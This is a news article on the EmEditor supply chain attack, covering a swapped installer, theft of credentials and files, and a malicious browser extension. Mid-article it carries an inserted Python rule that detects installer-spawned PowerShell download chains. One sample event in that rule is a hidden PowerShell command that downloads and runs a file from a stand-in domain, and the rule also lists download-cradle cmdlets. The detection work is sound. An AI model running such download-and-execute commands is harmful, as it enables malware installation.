
Infostealer Malware Delivered in EmEditor Supply Chain Attack

The ‘download’ button on the official EmEditor website served a malicious installer. The post Infostealer Malware Delivered in EmEditor Supply Chain Attack appeared first on SecurityWeek.

Code supply chain attack

The popular text and code editing software EmEditor was recently targeted in a supply chain attack that resulted in the distribution of infostealer malware.

Developed by Redmond-based Emurasoft, Inc., EmEditor is a high-performance Windows tool designed for coding, text editing, and processing large files.

In a security incident notice posted on the official website on December 22, the software’s developers warned that individuals who had downloaded EmEditor using the ‘download now’ button between December 19, 18:39 PT, and December 22, 12:50 PT, may have been served a malicious installer.

“If you downloaded the installer from the [Download Now] button on the EmEditor homepage during this period, it is possible that a different file without our digital signature was downloaded. This is a conservative estimate, and in reality the affected period may have been narrower and limited to a specific timeframe,” the notice reads.

Based on Emurasoft’s analysis, the URL behind the ‘Download Now’ button was changed to point to a malicious .msi file hosted in a different location on the EmEditor website.

The fake installer had the same name and was similar in size to the genuine installer, but was signed with a certificate belonging to a different company.

When run, the malicious installer executed a PowerShell command designed to download and execute a file from a fake EmEditor domain. 
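The behaviour described above, an installer package spawning PowerShell to fetch and run a second stage, is the kind of parent/child process chain that endpoint telemetry can flag. The following is an added example, not code from the SecurityWeek article, Emurasoft or Qianxin: it runs a simple detection rule over constructed process-creation records shaped like Sysmon Event ID 1 fields. The command lines, the `fake-editor-domain.invalid` host and the list of "installer" parent images are all assumptions made for the demonstration; the article does not quote the actual command used in the EmEditor incident.

```python
"""Flag installer -> PowerShell download-and-execute chains in process-creation logs.

Added example (not from the article or the vendors it cites). The events below
are constructed to resemble Sysmon Event ID 1 fields; the marker list is a set
of generic PowerShell download-cradle cmdlets and aliases, not indicators taken
from the EmEditor incident.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


# Generic "fetch something from the network and run it" markers in PowerShell.
DOWNLOAD_MARKERS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Invoke-Expression"
    r"|\biex\b|Start-BitsTransfer|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
URL_PATTERN = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)

# Assumption: installers normally have no reason to launch PowerShell at all,
# so any PowerShell child of these parents is worth a closer look.
INSTALLER_PARENTS = {"msiexec.exe", "setup.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: ProcessEvent):
    """Return a finding dict for a suspicious installer->PowerShell chain, else None."""
    if basename(event.image) not in POWERSHELL_IMAGES:
        return None
    if basename(event.parent_image) not in INSTALLER_PARENTS:
        return None
    markers = sorted({m.lower() for m in DOWNLOAD_MARKERS.findall(event.command_line)})
    if not markers:
        # PowerShell under an installer without network fetch markers: still
        # unusual, but outside this rule's scope.
        return None
    return {
        "parent": basename(event.parent_image),
        "markers": markers,
        "urls": URL_PATTERN.findall(event.command_line),
    }


def scan(events):
    """Apply classify() to every event and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f]


# Constructed sample telemetry (not real logs from the incident).
SAMPLE_EVENTS = [
    ProcessEvent(
        "C:\\Windows\\System32\\msiexec.exe",
        "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "powershell.exe -w hidden -c \"Invoke-WebRequest "
        "https://fake-editor-domain.invalid/update/setup.exe "
        "-OutFile $env:TEMP\\setup.exe; Start-Process $env:TEMP\\setup.exe\"",
    ),
    # Benign: an admin pulling a report from Explorer, not from an installer.
    ProcessEvent(
        "C:\\Windows\\explorer.exe",
        "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "powershell.exe -c \"Invoke-WebRequest https://internal.example/report.csv -OutFile r.csv\"",
    ),
    # Installer running PowerShell for a local registry read: no network fetch.
    ProcessEvent(
        "C:\\Windows\\System32\\msiexec.exe",
        "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "powershell.exe -NoProfile -c \"Get-ItemProperty 'HKLM:\\SOFTWARE\\Example'\"",
    ),
    # Installer spawning cmd.exe: not PowerShell, ignored by this rule.
    ProcessEvent(
        "C:\\Windows\\System32\\msiexec.exe",
        "C:\\Windows\\System32\\cmd.exe",
        "cmd.exe /c echo done",
    ),
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The rule deliberately keys on the parent process rather than on a specific domain or hash, because, as the article notes, the attackers reused the product's name and a plausible-looking domain; a signer check on the downloaded installer (the genuine one carries Emurasoft's signature, the fake one a different company's) is the complementary control on the download side.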

The Chinese cybersecurity company Qianxin has investigated the attack and warned enterprises and government organizations about the potential threat. The security firm noted that the editor has a significant user base in China.

Qianxin’s analysis showed that the malicious .msi file contained a script designed to collect system information, along with files from the Desktop, Documents, and Downloads folders. Data such as VPN configurations, browser information, and credentials for Windows and applications such as Zoho Mail, Discord, Slack, Teams, Zoom, WinSCP, PuTTY, Telegram, and Steam are also collected. 

The security firm pointed out that the malware checks the system’s language, and it terminates if it’s set to former Soviet countries or Iran. 

Qianxin researchers also found that once it collects information, the malicious script deploys a browser extension named ‘Google Drive Caching’, which has been described as a fully-featured information-stealing malware.

This malicious extension is used for persistence and enables the attackers to collect system information, browser history and bookmarks, and cookies.

In addition, the extension has clipboard hijacking functionality that enables it to replace cryptocurrency addresses with ones owned by the attacker. It’s also capable of logging keystrokes and stealing Facebook ad accounts.

Qianxin has not shared any information on attribution, but its description suggests that the supply chain attack was conducted by profit-driven cybercriminals rather than a state-sponsored APT. However, the cybersecurity industry says the lines between the two threat actor categories are increasingly blurred.

Indicators of compromise (IoCs) for the EmEditor attack are available from Qianxin and Emurasoft.

Related: 640 NPM Packages Infected in New ‘Shai-Hulud’ Supply Chain Attack

Related: Chinese Cyberspies Deploy ‘BadAudio’ Malware via Supply Chain Attacks

Related: Supply Chain Attack Targets VS Code Extensions With ‘GlassWorm’ Malware
